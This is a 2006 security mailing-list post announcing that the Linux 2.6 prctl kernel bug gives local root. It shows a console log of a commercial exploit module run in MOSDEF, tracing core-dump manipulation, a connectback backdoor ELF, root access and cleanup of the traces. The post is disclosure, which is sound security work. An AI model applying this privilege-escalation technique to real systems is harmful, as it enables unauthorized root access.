Dailydave mailing list archives

DSU


From: Dave Aitel <dave () immunityinc com>
Date: Tue, 11 Jul 2006 09:57:42 -0400

So the 2.6 prctl kernel bug is exploitable to get root. Typically on
these sorts of things, you just read what Paul Starzetz has to say on
the matter and accept it. But for people who are having problems
believing it, we posted an exploit to the partner's page about it.

This is the difference between Linux and Windows. If this had been
Microsoft they would have just changed the behavior silently or made it
part of some other patch and hoped no one noticed.

Example commandline usage on Linux MOSDEF node:

Linux/MOSDEF$ runmodule DSU -v0 -t127.0.0.1
[C] Running module: DSU

[C] Args: -v0 -t127.0.0.1
Loading DSU ...
 [ ok ]
[C] ID: 0 Setinfo: > DSU (in progress) <
[C] prctl ok.
[C] RLIMIT_CORE before: [0L, 4294967295L]
[C] setrlimit result: 0
[C] RLIMIT_CORE after: [8192L, 8192L]
[C] prctl ok.
[C] chdir ok.
[C] connectback ELF size: 2998
[C] file wrote successfully
[C] strcpy ok.
[C] fork result: 4830
[C] kill worked.
[C] Segmentation fault (core dumped)
[C] waiting
[C] ROOOOOOOOOOOOOOOOOOT
[C] Self.fd=4
[C] Set up Linux dynamic linking assembly component server
Initialized sendint with fd=4
[C] Initialized Local Functions.
[C] Resetting signal handlers...
[C] Reset sigchild
[C] Getting UIDs
[C] backdoor file removed.
[C] coredump file removed.
[C] Done.
[C] ID: 0 Setinfo: > DSU Done <
[C] UID=0 EUID=0 GID=0 EGID=0
Linux/MOSDEF#